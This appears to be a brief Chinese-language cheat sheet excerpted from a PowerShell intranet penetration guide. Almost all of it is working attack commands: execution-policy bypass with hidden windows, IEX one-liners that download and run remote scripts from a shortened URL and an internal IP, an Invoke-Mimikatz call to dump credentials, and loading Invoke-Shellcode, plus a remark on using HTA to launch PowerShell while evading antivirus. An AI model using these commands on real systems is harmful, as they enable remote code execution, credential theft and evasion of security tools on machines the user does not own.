摘自:《powershell内网***_light》
本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1直接用IEX下载远程的PS1脚本回来权限绕过执行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
内网***实例
远程代码执行:
IEX (New-Object Net.WebClient).DownloadString(“http:///path/xxx.ps1”)
目标主机‘安装’invoke-shellcode脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")查看帮助信息:
Get-Help Invoke-Shellcode
有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。(文章地址:)